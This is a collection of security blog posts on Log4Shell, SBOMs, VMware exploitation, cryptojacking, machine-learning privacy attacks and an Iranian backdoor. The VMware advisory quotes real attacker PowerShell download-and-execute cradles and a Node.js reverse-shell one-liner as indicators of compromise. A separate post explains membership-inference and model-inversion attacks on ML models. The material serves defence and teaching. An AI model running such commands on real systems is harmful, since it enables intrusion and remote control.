Open-Source Security: Getting to the Root of the Problem

 

Description

The past few weeks have shown us the importance and wide reach of open-source security. In December 2021, public disclosure of the Log4Shell vulnerability in Log4j, an open-source logging library, caused a cascade of dependency analysis by developers in organizations around the world. The incident was so wide-reaching that representatives from federal agencies and large private-sector companies gathered on January 13, 2022, at a White House meeting to discuss initiatives for securing open-source software.

A large percentage of the software we rely on today is proprietary or closed-source, meaning that the software is fully controlled by the company and closed for independent review. But in most cases, all of the code written to build the proprietary software is not entirely produced by the companies that provide the products and services; instead, they use a third-party library or a component piece of software to help them assemble their solution.

Many of those third-party components are classified as open-source software, meaning the source code is freely available for anyone to use, view, change to correct issues, or enhance to add new functionality. Open-source software projects are frequently maintained by volunteers, and a community of developers and users forms around a shared passion for the software. It’s their passion and collaboration that help projects grow and remain supported.

Finding the resources for open-source security

Yet for the majority of open-source projects that do not have a large corporate backer, the role these individuals play is frequently overlooked by software consumers, and as a result, many open-source projects face maintenance challenges.

Limited resources impose a variety of constraints on projects, but the implications are particularly wide-reaching when we look at the challenge of securing open-source software. Vulnerabilities discovered in proprietary software are the responsibility of the software vendor, frequently better funded than open-source software, with teams available to triage and resolve defects. Better — or any— funding, or broader community participation, may also increase the chance of avoiding vulnerabilities during development or discovering them during quality assurance checks. It can also help developers more quickly identify and resolve vulnerabilities discovered at a future date.

Increasing open-source project funding is a wonderful idea, and it’s in the best interest of companies using such software to build their products and services. However, funding alone won’t increase security in open-source projects, just as the greater source code visibility in open-source hasn’t necessarily resulted in fewer defects or shortened times between defect introduction and resolution.

For example, the vulnerability in Microsoft’s Server Message Block (SMB) protocol implementation (CVE-2017-0144) was around for many years before the defect was resolved in 2017. Similarly, the Log4Shell (CVE-2021-44228) vulnerability in the Log4j project was introduced in 2013, and it remained undiscovered and unresolved until December 2021. There is clearly a massive difference in both funding and available resources to those involved in these projects, and yet both were able to have vulnerable defects exist for years before resolution.

Solving the problem at the source (code)

Accidental software vulnerabilities share similar root causes whether they’re found in proprietary or open-source software. When developers create new features or modify existing ones, we need code reviews that look beyond feature functionality confirmation. We need to inspect the code changes for security issues but also perform a deeper analysis, with attention to the security implications of these changes within the greater scope of the complete project.

The challenge is that not all developers are security practitioners, and that is not a realistic expectation. The limited resources of open-source projects compound the problem, increasing the likelihood that contribution reviews focus primarily on functionality. We should encourage developer training in secure coding practices but understand that mistakes are still possible. That means we need processes and tooling to assist with secure coding.

Security in open-source software carries some other unique challenges due to the open environment. Projects tend to accept a wide variety of contributions from anyone. A new feature might not have enough of a demand to get time from the primary developers, but anyone who takes the time to develop the feature while staying within the bounds of the project’s goals and best practices may very well have their contribution accepted and merged into the project. Projects may find themselves the target of malicious contributions through covert defect introduction. The project may even be sabotaged by a project maintainer, or the original maintainer may want to retire from the project and end up handing it over to another party that — intentionally or not— introduces a defect.

It’s important for us to identify open-source projects that are critical to the software supply chain and ensure these projects are sustainably maintained for the future. These goals would benefit from increased adoption of secure coding practices and infrastructure that ensures secure distribution and verification of software build artifacts.

NEVER MISS A BLOG

Read More

Will 2022 Be the Year of the Software Bill of Materials?

 

Description

Here, have a can of soup.

Nah, we don’t know what’s in it. Could be 30 percent insect parts, could be seasoned with rat hair, who can say? The ingredients keep changing anyway. Just pour it into your network and pray.

That, unfortunately, is the current state of cybersecurity: a teeth-grinding situation in which supply-chain attacks force companies to sift through their software to find out where bugs are hiding before cyberattackers beat them to the punch. It’s a lot easier said than done.

The problem has been underscored by the massive SolarWinds supply-chain attack and by organizations’ frustrating, ongoing hunt for the ubiquitous, much-exploited Log4j Apache logging library. The problem predates both, of course: In fact, it’s one of the “never got around to it, keeping meaning to” issues that one security expert – Sophos principal security researcher Paul Ducklin – stuck an elbow in our rib about when it came time for end-of-year coverage.

“We’re awash in supply-chain attacks, whether they’re caused by active and purposeful hacking into software providers to poison code on purpose (e.g. Kaseya), or by an inattentive and casual attitude to sucking software components into our own products and services without even being aware (e.g. Log4Shell),” Ducklin told Threatpost.

“For years, we’ve batted around the idea that computer software and cloud services ought to have a credible ‘bill of materials’ that would make it easy to figure out which newsworthy bugs might apply to each and every product we use,” he continued.

Will 2022 be the year that finally ushers in the much-longed-for software bills of materials (SBOMs), the machine-readable documents that provide a definitive record of the components used to build a software product, including open-source software?

It’s looking that way, given the Biden administration’s attention to the issue, and security experts’ beating of the SBOM drum of late.

We pulled together a roundtable of security experts to share a host of year-end thoughts, and the SBOM issue boiled to the top. What follows are their thoughts on why SBOMs should be essential, why they’re so hard to build and maintain, why software makers don’t even know about bugs in their own products, and whether, maybe, this might be the year when we finally see SBOM progress.

The Mess that the Lack of SBOM Has Stuck Us With

As it now stands, organizations desperately need new tools to help them fend off the nonstop stream of attacks that are exploiting supply-chain vulnerabilities.

Lavi Lazarovitz, head of research at CyberArk Labs, pointed out that libraries – such as the Log4j logging library at the heart of the Log4Shell internet mini-meltdown – are used ubiquitously. That makes them “prime targets for trojanization,” he said.

“The code is replicated in many applications, and so are the vulnerabilities,” he said. This year, we’ve also seen several attempts to take advantage of the huge open-source attack surface with the trojanization of npm packages, as well as ongoing assaults against RubyGems — code repositories for open-source developer building blocks.

Many organizations lack visibility when it comes to what packages are used and where, which intensifies the impact of vulnerable or trojanized packages, Lazarovitz said: “Together with the challenge of patching affected software, a wide enough window is created for both opportunistic and targeted threat actors.”

Vulnerable or trojanized open-source packages or code libraries “are usually a solid initial foothold that circumvents perimeter defenses like firewalls and traditional endpoint-security controls,” he said. “The malicious code is executed as part of the vulnerable package or trojanized library, while leveraging the privileges and access granted to it.”

In the case of the Log4j library, the Log4Shell bug allows a malicious Java class to be injected into a vulnerable, benign process to run ransomware or other malware on infected systems. In the trojanized URL-Parser library case, cybercriminals executed credential-stealer code to compromise login credentials and keys. These and other attack vectors require organizations “to better monitor and control the code used by developers to minimize the attack surface and double down on containment of malicious code within a benign library by securing credentials stores and limiting privileges and access of both users and services,” Lazarovitz said.

Tony Anscombe, chief security evangelist at ESET, is hopeful that the continued parade of supply-chain vulnerabilities and attacks will create greater corporate awareness on the importance of knowing what solutions are in use and what technologies may be embedded within them.

“The Kaseya supply chain attack demonstrated that attackers have ambitious targets that can cause thousands of businesses to be attacked simultaneously,” he noted. If there’s any upside to the year we just went through, it’s that these supply-chain attacks are likely to cause many companies to refresh and audit the requirements placed on third-party service and software providers, Anscombe forecast.

The Log4J issues are, of course, another force that will raise execs’ questions about auditing and software inventories, as they’ve seen their IT teams scrambling to scan networks to ascertain if they have instances of the vulnerable code operating, Anscombe believes.

Why Is It So Difficult to Build & Maintain an SBOM?

Jon Clay, vice president of threat intelligence at Trend Micro, along with William Malik, Trend Micro vice president of infrastructure strategies, told Threatpost that currently, product labeling is a dribbled-out affair. First, there’s no information, then there’s scanty information and only eventually do we get the software equivalent of a comprehensive ingredients label.

“We’ll get there with software,” they predicted. “What source languages are in use? What shared code is included? And eventually they will be API’ed into a standards-based software asset-management database.”

As for why SBOMs are so difficult to build and maintain, Eric Byres, CTO at aDolus, noted that it’s straightforward to generate the SBOM when a software package is built, but what about software that’s already been shipped and installed? That category accounts for some 95 percent of the software used in critical systems today, Byres estimated.

“In these cases, SBOMs generated from the compiled software (aka binaries) are the only choice for, say, a power company wishing to manage their security risks or a supplier with decades of existing software,” Byres said. “The need for these binary-generated SBOMs is particularly critical in operational technology (OT), where industrial control system (ICS) equipment have expected life spans of 20 to 30 years. SBOMs are needed for decades of old but still actively used software.”

That said, when it comes to how many software packages companies use, what versions are in use and the number of components contained in each package, the numbers get overwhelming.

“If you are operating a midsized company with a thousand different software packages and versions in use, and each package has an SBOM with a thousand components, you’ll have more than 18 billion potential lookups,” Byres said. And that’s a low estimate, he cautioned: “​​We often see SBOMs with 100,000 elements.”

Obviously, checking for the needles of vulnerabilities and dependencies in these haystacks isn’t viable, he continued, which makes artificial intelligence a must-have to make lookups efficient and smart.

“For example, if you are searching for vulnerabilities for a SafeNet licensing module reported in your SBOM, you need to know to also search for Gemalto and Thales Group, because Gemalto bought SafeNet and the Thales Group bought Gemalto. And you need to be able to deal with issues like spelling mistakes – we see lots of cases where developers had typos in their company’s business name when compiling the software – these show up in SBOM, making searching vulnerability databases a real challenge.”

It gets worse, of course.

Liran Tancman, software security expert and CEO of cybersecurity firm Rezilion, told Threatpost that after an SBOM is developed, it needs to be maintained and updated whenever a change is made to any application component – changes that are constant.

“This includes code updates, vulnerability patches, new features and any other modifications,” Tancman described.

Auditing requirements make it even stickier: “Information integrity is key, so everything included in an SBOM should be auditable, including all version numbers and licenses,” Tancman continued. “They need to come from a reputable source and be verifiable by a third party.”

That work is currently done manually, he said, and changes can happen at any time, he added. “Since these need to be tracked in real time for the SBOM to be effective, this is obviously a very difficult task. That’s why it is critical for organizations to look into tools that offer the ability to have a dynamic SBOM that can incorporate updates automatically.”

Where Do Orgs Fail with This Dynamic Process?

Converting a mountain of SBOM data into actionable intelligence is a big challenge, Byres said.

aDolus calls it enriching the SBOM: taking the raw ingredient list of software, determining risk factors for each component and prioritizing them.

“Matching vulnerabilities to SBOM data is fraught with challenges, but vulnerabilities are only one risk factor,” he noted. “Some other software risk factors that we track at aDolus are malware potential, software obsolescence, country of origin and proof of origin (i.e. did the software come from the company you think it did?).”

All these factors require complex analysis done at lightning speeds for millions of components so that users can keep ahead of threat actors, Byres said.

Unfortunately, today’s SBOMs are static documents that don’t automatically incorporate updates, Tancman observed. Given that updating SBOMs isn’t currently a dynamic process, changes have to be made manually.

The future should bring dynamic SBOMs, or DBOMs, he said. Expect that to eventually become a requirement, “especially in organizations that create and update software products regularly.”

DBOMs will also be integrated into a product’s security lifecycle and be produced automatically at predefined stages, Tancman said, as well as being interoperable, which will lead to greater adoption.

Why Are Software Makers Clueless About Their Bugs?

Software providers are typically dealing with multiple layers of providers and likely can demand continuous updates on new vulnerabilities from the third-party suppliers they deal with directly. But what about the suppliers to their suppliers, as in, fourth-, fifth- and sixth-party suppliers, Byres pondered?

And what about all the cases where the developers used open-source software?

“Add in software that’s added via mergers and acquisitions and the bottom line is many suppliers lose track of the third-party vulnerabilities in their software soon after it is compiled and released,” he said.

Byres pointed to the incident with Blackberry in August, when memory bugs in its QNX embedded OS opened devices to attacks. The company failed to announce the vulnerabilities beyond a few immediate customers, leaving many using products with the embedded QNX clueless about propagating vulnerabilities to their own customers.

“But they would have known, if Blackberry had provided SBOMs,” Byres conjectured. “Both vendors and asset owners need tools like FACT [Framework for Analysis and Coordinated Trust] that let them quickly check if they have been shipping, or installing, malicious software that’s going to damage their reputations.”

Adding to the burden on software makers, Tancman noted, is the fact that vulnerabilities are constantly discovered, and nobody knows what to find and track before those vulnerabilities come to light.

On top of that, even if the vulnerability is known/disclosed, it can be difficult to discover because certain vulnerabilities (like Log4Shell) can be nested and tough to locate, Tancman said. “But given the nonstop nature of vulnerability discovery, it is nearly impossible to know all vulnerabilities in an environment at any given time.”

That’s why building security into the software development life cycle is so essential, Tancman emphasized. If a DevSecOps model is followed in development, there’s less of a chance of finding a flaw in production, he reasoned.

Executive Order Brings Reason for Hope

As luck would have it, 2022 may well be the year that the madness starts to get reined in. Last May, in the wake of the SolarWinds attack, President Biden issued an executive order advocating mandatory SBOMs to increase software transparency and to counter supply-chain attacks. As noted by JupiterOne CISO Sounil Yu, writing for Threatpost in October, it would be one step toward “providing greater transparency for the software that all organizations must buy and use.”

The SBOMs will be required to enumerate all of the components – open-source and commercial – that get glued together willy-nilly in products. According to the EO, SBOMs will help everybody in the software supply chain, including those parties who make, buy and operate software.

“Developers often use available open-source and third-party software components to create a product; an SBOM allows the builder to make sure those components are up-to-date and to respond quickly to new vulnerabilities,” according to the EO.

The EO stipulated that SBOMs will also:

• Enable buyers to perform vulnerability or license analysis, both of which can be used to evaluate risk in a product;
• Enable software operators to quickly and easily determine whether they’re at potential risk of a newly discovered vulnerability;
• Enable automation and tool integration; and
• Be collectively stored in a repository that can be easily queried by other applications and systems.

Security professionals such as JupiterOne’s Yu are encouraged by the SBOM mandate, he said. Since the EO was issued, software-makers and buyers gearing up to comply have been trying to make sense of how SBOMs support supply-chain security.

“Undoubtedly, many see it as a headache, but I believe it is a sensible safeguard. Part of our problem around supply chains is that we trust in them too much,” Yu wrote. “We have learned the benefits of a zero-trust security model and applied this concept to our networks and endpoints, but we haven’t quite figured out how to do this for our supply chains.”

He added, “We still rely heavily upon time-consuming questionnaires that perpetuate the continued reliance on trust as the foundation for supply-chain security.”

Bob Rudis, chief data scientist for Rapid7, said that the EO also included a plethora of other, substantive federal initiatives designed to shore up the nation’s cyber-defenses.

The SBOM mandate will take effect in the second half of 2022 and will “do nothing short of revolutionizing how software is built, delivered and identified,” Rudis predicted

The SBOM will be required to accompany all application deliverables sold to the federal government and will chronicle the entire lineage of an application, down to the smallest subcomponent, he said.

“Many large healthcare and financial services organizations have climbed on board the SBOM train and will be following the Federal government’s lead and also requiring SBOMs as they renew contracts and acquire new components,” Rudis noted.

“SBOMs will make it possible for organizations to identify vulnerable components of applications they own and have deployed. Coupled with a solid asset-management and identification system, SBOMs will make it much easier to identify where vulnerable components are and ensure they are protected and updated to stave off threats,” he concluded. “This will make deployed applications much, much safer and organizations far more resilient than they currently are. It will take time, but we should start seeing some benefits immediately as this rolls out in the latter half of 2022.”

Hallelujah to that: The adoption of SBOMs has already taken far too long over far too many years of mulling, security practitioners agree. It can’t come soon enough.

_011922 08:42 UPDATES: Corrected Eric Byres’ title, spellout of FACT acronym, attribution of quotes. _

Photo courtesy of Pixabay.

Read More

The Log4j Vulnerability Puts Pressure on the Security World

 

Description

It’s not my intention to be alarmist about the Log4j vulnerability (CVE-2021-44228), known as Log4Shell, but this one is pretty bad.

First of all, Log4j is a ubiquitous logging library that is very widely used by millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the most serious vulnerability she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberattackers are already exploiting the vulnerability hundreds of times_ every minute._ The fact is, Log4Shell is relatively easy to exploit, so even low-skilled hackers can take advantage.

OK, maybe it is time for alarm.

Log4j is open-source software from the Apache Software Foundation. As explained by The Conversation, this logging library is widely used to record events such as routine system operations and errors, and to communicate diagnostic messages regarding those events. A feature in Log4j allows users of the software to specify custom code for formatting a log message. This feature also allows third-party servers to submit software code that can perform all kinds of actions – including malicious ones – on the targeted computer. The result of an exploit for the bug is that an attacker can control a targeted server remotely.

Attackers Took Early Advantage

Within weeks of discovery of the flaw in mid-December, it was already reported that nation-state actors linked to North Korea, China, Iran and other countries had created toolkits for mass-exploiting this vulnerability quickly. Log4Shell also became a darling of the ransomware and botnet gangs operating around the globe. A real danger in this flaw is that there are so many ways to exploit it for malicious purposes.

How prevalent is Log4j in business systems? Analysis by Wiz and Ernst & Young of more than 200 enterprise cloud environments with thousands of cloud accounts showed that 93 percent of those environments are at risk from the vulnerability.

Google researchers discovered that more than 8 percent of all packages on Maven Central, a large Java package repository, have at least one version that is impacted by this vulnerability—an “enormous” amount by all standards of ecosystem impact.

So, yeah, that’s pretty extensive presence of this vulnerability. As for the global impact, it’s still too early to tell. Much will depend on how well organizations respond to the threat.

Everyone Must Take Action

For everyone affected by this, there is both a business and moral imperative to take immediate steps to mitigate the vulnerability if it exists within public-facing systems. Naturally, no business wants its systems to be vulnerable to an attack that can lead to the corruption or theft of data and the potential for severe business disruption.

As for the moral imperative, the Federal Trade Commission points out that companies have a responsibility to take steps “to reduce the likelihood of harm to consumers.” With the fallout from the Equifax breach still fresh in memory, the FTC warns that it “intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.” Not every company serves consumers, of course, but that shouldn’t matter with regard to addressing this issue.

CISA issued a list of “immediate actions” that organizations must undertake to remediate the risks posed by Log4Shell. The top action is to understand the extent of the problem by identifying which of your assets use the Log4j software and then apply an appropriate patch. Stop the bleed, so to speak.

After that, you must assume you have already been compromised, hunt for signs of malicious activity within your systems, and continue to monitor for odd traffic patterns or behavior that could be indicative of an ongoing attack.

It’s essential to detect the threat activity as the vulnerability is exploited or as attackers successfully insert themselves into your environment. This is where the efficacy of your security tools is put to the test.

How Effective Are Your Security Tools?

Security tools that are dependent on traditional rule-based detection and pattern matching may have easily caught some of the commands being executed by injected malware in the early days of this exploit. However, as variants of Log4Shell hit the wild with better execution tactics, traditional security information and event management (SIEM) and extended detection and response (XDR) tools may struggle to identify attacks unless tool vendors make very frequent updates to the rule base. And that just isn’t practical. Taking a layered security approach that includes some advanced detection methods such as machine learning, artificial intelligence and behavior analytics will also be crucial.

Every organization should have a mitigation plan in case something like this comes up again in the future. Whether it be to shut down the offending piece of software, or immediately patch it and test the patch before it goes back into production, teams need to be prepared for a proactive response within hours or even minutes.

Log4Shell is a wake-up call for everyone. We shouldn’t hit the snooze button until the next vulnerability comes around.

Read More

Active Exploitation of VMware Horizon Servers

 

Description

This post is co-authored by Charlie Stafford, Lead Security Researcher.

We will update this blog with further information as it becomes available.

CVE	Vendor Advisory	AttackerKB	IVM Content	Patching Urgency	Blog’s Last Update
CVE-2021-44228	VMware Advisory	AttackerKB	Under Evaluation	Emergency	January 19, 2022 1:20PM ET

Summary

Attackers are actively targeting VMware Horizon servers vulnerable to Apache Log4j CVE-2021-44228 (Log4Shell) and related vulnerabilities that were patched in December 2021. We’re sharing our observed activities and indicators of compromise (IOCs) related to this activity.

Details

Beginning Friday, January 14, 2022, Rapid7 Managed Detection & Response (MDR) began monitoring a sudden increase in VMware Horizon exploitation. The activity our teams are observing is similar to observed threat activity detailed by NHS Digital. Rapid7 services and research teams expect to see a continued strong upward trend in attacker activity directed at VMware Horizon instances vulnerable to Log4Shell exploits.

Rapid7 customers

Rapid7 InsightIDR and MDR customers: Alerts generated by the following detection rules can assist in identifying successful VMware Horizon exploitation:

• Attacker Technique - PowerShell Download Cradles (created: Thursday, January 3, 2019, 15:31:27 UTC)
• Suspicious Process - VMWare Horizon Spawns CMD or PowerShell (created: Thursday, January 6, 2022, 14:18:21 UTC)
  • On January 19, 2022 this rule has been renamed “Suspicious Process - VMWare Horizon Spawns Process”

Rapid7 researchers are currently evaluating the feasibility of adding a VMware Horizon vulnerability check for Nexpose/InsightVM.

We have a dedicated resource page for the Log4j vulnerability, which includes our AttackerKB analysis of Log4Shell containing a proof-of-concept exploit for VMware Horizon.

Recommendations

Patch Immediately: Organizations that still have a vulnerable version of VMware Horizon in their environment should update to a patched version of Horizon on an emergency basis and review the system(s) for signs of compromise. As a general practice, Rapid7 recommends never exposing VMware Horizon to the public internet, only allowing access behind a VPN.

Organizations are advised to proactively block traffic to the IPs/URLs listed in the IOCs section.

Observed activities

Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team has identified five unique avenues that attackers have taken post-exploitation, indicating that multiple actors are involved in this mass exploitation activity.

The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system.

TIDE has observed the attacker downloading cryptocurrency miners from the following URLs:

• http://72.46.52[.]135/mad_micky.bat
• http://80.71.158[.]96/xms.ps1
• http://101.79.1[.]118/2.ps1

The following is an example PowerShell command from this activity (note that these contents were originally base64 encoded):

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://72.46.52[.]135/mad_micky.bat', $tempfile); & $tempfile

The System.Net.WebClient download cradle has also been used by one unknown actor to deploy a reverse shell based on Invoke-WebRev (https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Invoke-WebRev.ps1) from http://87.121.52[.]221:443/dd.ps1. Another actor has used it to download a Cobalt Strike backdoor from http://185.112.83[.]116:8080/drv. This backdoor was created using the trial version of Cobalt Strike, meaning it contains the EICAR anti-virus test string which should be identified by any AV vendor.

One actor attempts to use System.Net.WebClient to download a rudimentary backdoor from http://0.tcp.ngrok[.]io:18765/qs.exe. If this method fails, the PowerShell BitsTransfer object is used as a backup download method. In this instance, the actor is using ngrok[.]io URLs. NGrok is a tool that allows a user to tunnel traffic through a NAT or firewall. The backdoor communicates with http://2.tcp.ngrok[.]io:19969/index.php and will execute PowerShell commands received from that host.

Example command from this activity:

$a="http://0.tcp.ngrok[.]io:18765/qs.exe";$b="c:\windows\temp\qs.exe";$c = "c:\users\public\qs.exe";Import-Module BitsTransfer;try{(New-Object System.Net.WebClient).DownloadFile($a, $b);Start-Process -FilePath $b;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $b;Start-Process -FilePath $b;exit;}catch{};try{(New-Object System.Net.WebClient).DownloadFile($a, $c);Start-Process -FilePath $c;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $c;Start-Process -FilePath $c;exit;}catch{}

The final method TIDE has observed at Rapid7 customers involves the attacker using the copy of Node included with the VMWare server at C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe. Node is used to execute a small snippet of JavaScript code that establishes a reverse shell to 146.59.130.58:

C:\"Program Files"\VMware\"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(4460, '146.59.130.58', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"

Indicators of compromise (IOC)

The full list of IOCs that TIDE has observed related to this activity is as follows:

• 72.46.52[.]135

  • mad_micky.bat
  • 58e22726592ec5ab6ca49eda2fdb7017

• 80.71.158[.]96

  • xms.ps1
  • e397087edf21ad9da907b595691ce15e

• 101.79.1[.]118

  • 2.ps1
  • 6422ede9aadd1a768cb57fe06c1155ad

• 87.121.52[.]221

  • dd.ps1
  • f7d5a47321e436fe33e03c4dbf29bd92

• 185.112.83[.]116

  • drv
  • 00a4e6f11d2dae5146995aa489292677

• 0.tcp.ngrok[.]io:18765

• 2.tcp.ngrok[.]io:19969

  • qs.exe
  • 1fcf790cc9c66794ae93c114c61b412e

• 146.59.130.58

Updates

January 19, 2020 - IDR rule VMWare Horizon Spawns CMD or PowerShell has been renamed Suspicious Process - VMWare Horizon Spawns Process

February 4, 2022 - Coverage has been added for CVE-2021-4506 (the Log4j weakness identified within VMware Horizon Connection Server).

NEVER MISS A BLOG

Read More

Cybercriminals Actively Target VMware vSphere with Cryptominers

 

Description

Organizations running sophisticated virtual networks with VMware’s vSphere service are actively being targeted by cryptojackers, who have figured out how to inject the XMRig commercial cryptominer into the environment, undetected.

Uptycs’ Siddharth Sharma has released research showing threat actors are using malicious shell scripts to make modifications and run the cryptominer on vSphere virtual networks.

“Cryptojacking campaigns mostly target the systems having high-end resources,” Sharma pointed out. “In this campaign as we saw the attackers tried to register the XMRig miner itself as a service (daemon), which runs whenever the system gets rebooted.”

To avoid detection, the script also downloads a user-mode rootkit from the command-and-control server (C2), the report added.

“The shell script also contains commands which download the miner, the config file and the user mode rootkit from the attacker’s web server,” the report explained. “The attackers used [the] wget utility to fetch the malicious components and chmod utility to make the components executable.”

The report said the rootkit gets saved as “libload.so” and the script modifies vSphere to run the XMRig cryptominer.

Source: Uptycs.

After the cryptominer is dropped, the script reloads the service to get the miner started, Sharma explained. The report also reported the attacker’s wallet has been paid 8.942 XMR, the report said, or about $1,790 as of press time.

VMware Services Under Attack

VMware services have been beleaguered by recent security issues.

The new year kicked off with a high-severity bug found in VMWare’s Cloud Foundation, ESXi, Fusion and Workstation platforms, which opened the door for a hypervisor takeover of an organization’s entire virtualized environment.

And just days ago VMWare’s Horizon servers with Log4Shell vulnerabilities were observed under active Cobalt Strike attack by researchers at Huntress after the U.K.’s National Health Service were targeted on Jan 5.

Sharma advises security teams running VMware services to look for unusual network activity to detect the cryptominer, as well as other attacks.

“In the past we have seen highly sophisticated groups targeting vulnerable VMware services,” Sharma said. “Hence it becomes really important to monitor the suspicious processes, events and network traffic spawned on the execution of any untrusted shell script.”

Read More

Being Naughty to See Who Was Nice: Machine Learning Attacks on Santa’s List

 

Description

Editor’s note:We had planned to publish our Hacky Holidays blog series throughout December 2021 – but then Log4Shell happened, and we dropped everything to focus on this major vulnerability that impacted the entire cybersecurity community worldwide. Now that it’s 2022, we’re feeling in need of some holiday cheer, and we hope you’re still in the spirit of the season, too. Throughout January, we’ll be publishing Hacky Holidays content (with a few tweaks, of course) to give the new year a festive start. So, grab an eggnog latte, line up the carols on Spotify, and let’s pick up where we left off.

Santa’s task of making the nice and naughty list has gotten a lot harder over time. According to estimates, there are around 2.2 billion children in the world. That’s a lot of children to make a list of, much less check it twice! So like many organizations with big data problems, Santa has turned to machine learning to help him solve the issue and built a classifier using historical naughty and nice lists. This makes it easy to let the algorithm decide whether they’ll be getting the gifts they’ve asked for or a lump of coal.

Santa’s lists have long been a jealously guarded secret. After all, being on the naughty list can turn one into a social pariah. Thus, Santa has very carefully protected his training data — it’s locked up tight. Santa has, however, made his model’s API available to anyone who wants it. That way, a parent can check whether their child is on the nice or naughty list.

Santa, being a just and equitable person, has already asked his data elves to tackle issues of algorithmic bias. Unfortunately, these data elves have overlooked some issues in machine learning security. Specifically, the issues of membership inference and model inversion.

Membership inference attacks

Membership inference is a class of machine learning attacks that allows a naughty attacker to query a model and ask, in effect, “Was this example in your training data?” Using the techniques of Salem et al. or a tool like PrivacyRaven, an attacker can train a model that figures out whether or not a model has seen an example before.

From a technical perspective, we know that there is some amount of memorization in models, and so when they make their predictions, they are more likely to be confident on items that they have seen before — in some ways, “memorizing” examples that have already been seen. We can then create a dataset for our “shadow” model — a model that approximates Santa’s nice/naughty system, trained on data that we’ve collected and labeled ourselves.

We can then take the training data and label the outputs of this model with a “True” value — it was in the training dataset. Then, we can run some additional data through the model for inference and collect the outputs and label it with a “False” value — it was not in the training dataset. It doesn’t matter if these in-training and out-of-training data points are nice or naughty — just that we know if they were in the “shadow” training dataset or not. Using this “shadow” dataset, we train a simple model to answer the yes or no question: “Was this in the training data?” Then, we can turn our naughty algorithm against Santa’s model — “Dear Santa, was this in your training dataset?” This lets us take real inputs to Santa’s model and find out if the model was trained on that data — effectively letting us de-anonymize the historical nice and naughty lists!

Model inversion

Now being able to take some inputs and de-anonymize them is fun, but what if we could get the model to just tell us all its secrets? That’s where model inversion comes in! Fredrikson_ et al_. proposed model inversion in 2015 and really opened up the realm of possibilities for extracting data from models. Model inversion seeks to take a model and, as the name implies, turn the output we can see into the training inputs. Today, extracting data from models has been done at scale by the likes of Carlini et al_._, who have managed to extract data from large language models like GPT-2.

In model inversion, we aim to extract memorized training data from the model. This is easier with generative models than with classifiers, but a classifier can be used as part of a larger model called a Generative Adversarial Network (GAN). We then sample the generator, requesting text or images from the model. Then, we use the membership inference attack mentioned above to identify outputs that are more likely to belong to the training set. We can iterate this process over and over to generate progressively more training set-like outputs. In time, this will provide us with memorized training data.

Note that model inversion is a much heavier lift than membership inference and can’t be done against all models all the time — but for models like Santa’s, where the training data is so sensitive, it’s worth considering how much we might expose! To date, model inversion has only been conducted in lab settings on models for text generation and image classification, so whether or not it could work on a binary classifier like Santa’s list remains an open question.

Mitigating model mayhem

Now, if you’re on the other side of this equation and want to help Santa secure his models, there are a few things we can do. First and foremost, we want to log, log, log! In order to carry out the attacks, the model — or a very good approximation — needs to be available to the attacker. If you see a suspicious number of queries, you can filter IP addresses or rate limit. Additionally, limiting the return values to merely “naughty” or “nice” instead of returning the probabilities can make both attacks more difficult.

For extremely sensitive applications, the use of differential privacy or optimizing with DPSGD can also make it much more difficult for attackers to carry out their attacks, but be aware that these techniques come with some accuracy loss. As a result, you may end up with some nice children on the naughty list and a naughty hacker on your nice list.

Santa making his list into a model will save him a whole lot of time, but if he’s not careful about how the model can be queried, it could also lead to some less-than-jolly times for his data. Membership inference and model inversion are two types of privacy-related attacks that models like this may be susceptible to. As a best practice, Santa should:

• Log information about queries like:
  • IP address
  • Input value
  • Output value
  • Time
• Consider differentially private model training
• Limit API access
• Limit the information returned from the model to label-only

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Subscribe

****************More Hacky Holidays blogs****************

• The 2021 Naughty and Nice Lists: Cybersecurity Edition
• 2022 Cybersecurity Predictions: The Experts Clear Off the Crystal Ball
• Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors
• Metasploit 2021 Annual Wrap-Up
• 5 Security Projects That Are Giving Back
• Sharing the Gifts of Cybersecurity – Or, a Lesson From My First Year Without Santa
• Hacky Holidays: Celebrating the Best of Security Nation [Video]
• Hacky Holidays From Rapid7! Announcing Our New Festive Blog Series

Read More

Iranian Hackers Exploit Log4j Vulnerability to Deploy PowerShell Backdoor

 

Description

An Iranian state-sponsored actor has been observed scanning and attempting to abuse the Log4Shell flaw in publicly-exposed Java applications to deploy a hitherto undocumented PowerShell-based modular backdoor dubbed "CharmPower" for follow-on post-exploitation.

“The actor’s attack setup was obviously rushed, as they used the basic open-source tool for the exploitation and based their operations on previous infrastructure, which made the attack easier to detect and attribute,” researchers from Check Point said in a report published this week.

The Israeli cybersecurity company linked the attack to a group known as APT35, which is also tracked using the codenames Charming Kitten, Phosphorus, and TA453, citing overlaps with toolsets previously identified as infrastructure used by the threat actor.

Log4Shell aka CVE-2021-44228 (CVSS score: 10.0) concerns a critical security vulnerability in the popular Log4j logging library that, if successfully exploited, could lead to remote execution of arbitrary code on compromised systems.

The ease of the exploitation coupled with the widespread use of Log4j library has created a vast pool of targets, even as the shortcoming has attracted swarms of bad actors, who have seized on the opportunity to stage a dizzying array of attacks since its public disclosure last month.

While Microsoft previously pointed out APT35’s efforts to acquire and modify the Log4j exploit, the latest findings show that the hacking group has operationalized the flaw to distribute the PowerShell implant capable of retrieving next-stage modules and exfiltrating data to a command-and-control (C2) server.

CharmPower’s modules also support a variety of intelligence gathering functionality, including features to gather system information, list installed applications, take screenshots, enumerate running processes, execute commands sent from the C2 server, and clean up any signs of evidence created by these components.

